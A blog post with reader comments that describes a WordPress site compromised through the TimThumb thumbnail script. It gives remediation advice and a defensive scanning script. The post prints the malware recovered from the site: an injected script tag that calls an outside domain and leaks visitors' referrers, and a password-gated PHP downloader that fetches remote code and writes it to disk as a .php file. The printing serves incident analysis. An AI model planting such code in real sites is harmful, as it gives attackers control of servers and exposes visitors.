WordPress sites using Timthumb.php are Prone to Hacking [Almost Every Theme]

Today one of my clients pinged me to say that he was unable to log in to his wp-admin. It was giving the error shown below:

“warning: Cannot modify header information – headers already sent by (output started at /home/stony/public_html/wp-settings.php:748) in /home/stony/public_html/wp-includes/pluggable.php on line 868”

When I logged into the client's site via FTP, I saw that some files had been modified and some strange PHP files had been added. The first piece of injected code was in index.php at the root of the WordPress installation:

[php]
// Injects a remote "counter" script into every page and leaks the visitor's referrer to it
echo '<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref=' . urlencode($_SERVER['HTTP_REFERER']) . '"></script>'; ?>
[/php]

Then, in the plugins folder, there was a file called upd.php containing the following code:

[php]
// Password-gated downloader: fetches whatever URL is passed in ?file=
// and saves the response under a random name as a .php file on the server
$file = $_GET['file'];
$pass = $_GET['pass'];
$true = '1c383cd30b7c298ab50293adfecb7b18';
if ($pass == $true){

$ch = curl_init($file);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$shell = curl_exec($ch);
curl_close($ch);

$tmp = md5(rand(0,10000));

$f = fopen($tmp.'.php',"w");
fputs($f,$shell);
fclose($f);
} // closing brace was cut off on the page
[/php]

Well, that's not all: many other files were infected too. The cause of this hack is remote code injection through a vulnerability in timthumb.php.

What is Timthumb.php?

Timthumb.php is one of the most popular scripts for auto-generating thumbnails, and it is used by almost all the popular premium WordPress theme clubs, which is why so many sites are getting infected. The vulnerability in timthumb.php allows a hacker to upload arbitrary PHP code into the script's cache directory and execute it. Once the hacker executes that PHP file he has almost complete control of your site and can do anything with it. In most cases you will see your site being redirected, or ads and popups appearing on it. In my client's case, wp-admin became inaccessible.

So what’s the solution to this timthumb.php Hack?

The very first thing you should do is scan your blog, or ask your hosting company to run a scan. Delete all unused themes and plugins. Update all plugins and themes to their latest versions. If you are using a free, outdated theme, switch to a premium WordPress theme or to a free theme that keeps getting regular updates. My recommendation is to grab the Thesis theme, which is well supported by the community and constantly updated. You can manually reinstall WordPress, update your theme and, most importantly, update the timthumb.php file. The author of the script has already released an updated version, which you can grab from here. Once done, recheck all files for any trace of the hacked code. You can use a WordPress security plugin to check whether any traces of the hacked files are left.

Even if you have not been hacked but are using an old version of a theme, I would suggest updating your theme to the latest version, or at least updating your timthumb.php. Always remember: prevention is better than cure.
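To make the "scan your blog" and "recheck all files" steps concrete, here is an added example (my own, not the author's or the TimThumb project's code) that walks a WordPress tree looking for the three traces described above: outdated TimThumb copies, PHP files dropped into a TimThumb cache directory, and the injected tracker tag and curl-based dropper. It assumes the VERSION threshold below which a copy is flagged (default 2.0, the rewrite released after this incident; the comments on this page put the vulnerable range at above 1.09 and below 1.35), and the sample tree it builds is constructed, with example.invalid standing in for the attacker's domain.

```shell
# Defensive scan for traces of the TimThumb hack described above. Added example,
# not the author's or the TimThumb project's code. Assumption: a copy is reported
# OUTDATED when its VERSION define is below MIN_OK (default 2.0, the rewrite
# released after this incident; the comments here put the vulnerable range at 1.09 < v < 1.35).
MIN_OK="${MIN_OK:-2.0}"
# version_lt A B: true when A's major.minor is below B's (e.g. 1.32 < 2.0).
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN { split(a, x, "."); split(b, y, ".");
        exit !((x[1]+0 < y[1]+0) || (x[1]+0 == y[1]+0 && x[2]+0 < y[2]+0)) }'
}
# timthumb_version FILE: print the VERSION constant of a TimThumb copy.
timthumb_version() {
    sed -n "s/.*define *( *['\"]VERSION['\"] *, *['\"]\([0-9.]*\)['\"].*/\1/p" "$1" | head -n 1
}
# scan_wp WORDPRESS_ROOT: one finding per line, prefixed with its type.
scan_wp() {
    root="$1"
    # 1. Every bundled copy (themes ship it as timthumb.php or thumb.php).
    find "$root" -type f \( -name timthumb.php -o -name thumb.php \) | while read -r f; do
        v="$(timthumb_version "$f")"
        if [ -z "$v" ]; then echo "UNKNOWN-VERSION $f"
        elif version_lt "$v" "$MIN_OK"; then echo "OUTDATED $v $f"; fi
        # 2. TimThumb writes only image data to its cache dir, so any .php there
        #    (the random-number names mentioned in the comments) was dropped.
        find "$(dirname "$f")/cache" -name '*.php' 2>/dev/null | sed 's/^/CACHE-PHP /'
    done
    # 3. The injected tracker tag from index.php, and curl-based droppers like
    #    upd.php that fetch a URL and write the response out as a .php file.
    grep -rl 'count\.php?ref=' "$root" 2>/dev/null | sed 's/^/INJECTED-TAG /'
    grep -rl --include='*.php' 'curl_exec' "$root" 2>/dev/null | while read -r f; do
        if grep -Eq 'fputs|fwrite' "$f"; then echo "DROPPER? $f"; fi
    done
}
# Constructed sample tree mirroring the infection above (not a real site).
make_sample_site() {
    d="$(mktemp -d)"
    mkdir -p "$d/wp-content/themes/demo/scripts/cache" "$d/wp-content/plugins"
    printf '<?php\ndefine ("VERSION", "1.32");\n' > "$d/wp-content/themes/demo/scripts/timthumb.php"
    printf '<?php // constructed dropped file\n' > "$d/wp-content/themes/demo/scripts/cache/4347623.php"
    printf '<?php echo "<script SRC=http://example.invalid/count.php?ref=x></script>";\n' > "$d/index.php"
    printf '<?php $shell = curl_exec($ch); fputs($f, $shell);\n' > "$d/wp-content/plugins/upd.php"
    echo "$d"
}
# Stand-alone demo on the constructed tree; on a real host run: scan_wp /path/to/wordpress
site="$(make_sample_site)"; scan_wp "$site"; rm -rf "$site"
```

A hit in any of the three categories means the affected file needs a manual look; the version check only compares major.minor, so read the VERSION line yourself before trusting an "OUTDATED" verdict on a patched 1.x copy.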

If you are not technically sound, or not familiar with FTP and fixing this kind of issue, you can get in touch via our WordPress services page and let our team fix your site.


Article By
Harsh Agrawal is a blog scientist and a passionate blogger. He has been blogging since 2008 and writes about blogging, SEO, making money online and tech. His blog, ShoutMeLoud, receives 1 million pageviews a month and has over 700K subscribers.


Comments (20)

  1. Sahil Kotak says

    Yeah, I have found such vulnerable files in WordPress many times. They are mostly some numbers.php (4347623.php or something like that).

  2. Vijay says

    Hi Harsh,
    Thanks for the info. File versions above 1.09 and below 1.35 are vulnerable to security attacks. I have updated the necessary files to the latest version.

    One question:
    There is one file named “timthumb.php.svn-base” having only 4 lines in it. Is it insecure to keep as is, or does it need to be updated? And what info does it have?


  3. Siddharth says

    Not sure about it, but people often use brute force attacks to hack into WP.. a few of my friends suffered as well.. Restricting the “wp-admin” folder to a particular IP might solve such admin problems, I guess.

  4. Saugat Adhikari says

    I have the same issue. I just logged into the WordPress directory with wp-login.php and reinstalled the update from the admin page. It works for me. :)

  5. Shariq says

    Thanks to Woo Themes. They mailed all their customers and notified them about the security risk. They instantly updated their framework, including timthumb. Users can easily update the framework via their theme options panel.

  6. Amy says

    As far as I know, the Timthumb code in Thesis (lib/scripts) is not the same as the one available at googlecode (the old Timthumb version). So is it okay to just copy it over like that?

    Of course the new version of Timthumb (googlecode) has new securities added.

    Is your client using Thesis, or did he use Timthumb from googlecode (old version)?

  7. says

    @Rakesh That's nice that you are using your own theme, and I hope you are not using any plugin to generate thumbnails or anything like that. If yes, update those plugins..

    @Prem @Fahad
    Glad I could help..Thanks for your comment.. :)

  8. Fahad says

    Thanks a lot Harsh. Well, my theme was also using the timthumb.php file and it was outdated; your post helped in securing my blog. Hurrah, updated to the latest version.

  9. rakesh kumar says

    Thanks a lot for this update. I have my own developed WordPress theme on my website and I have overall control of that theme, so, at last, my hard work is now paying off for me. At least I don't have to worry about this security hole.

  10. Manendra says

    Harsh, I am using the Thesis theme. Can I update this timthumb.php code which you provided..?? In this root directory: “thesis_18/lib/scripts/thumb.php”

  11. bhushan says

    Thanks Harsh for the reply. I am using the Mystique theme... but whenever I update my theme I lose my plugins :(

  12. bhushan says

    omg.. but while I update my theme it seems all plugins get damaged and all widgets become useless.. any solution or other way to update without any problem?

    • says

      What theme are you using? If you update the theme, I believe you won't lose the widgets. Or, if you want to be fail-safe, simply drag and drop your widgets to the inactive widgets tab, install the new theme and put the widgets back.

  13. Vivek Parmar says

    That's sad to hear that one of your clients became a victim. That's the reason why I use premium themes like Thesis and other popular frameworks :)

    • says

      @Vivek My client is just an example; it could be anyone who is using an outdated timthumb.php script or an outdated WordPress theme. Even many premium theme clubs have updated their themes with the updated timthumb.php script. So the quick suggestion is: update your timthumb script, or, if your theme club has rolled out an update, update your theme.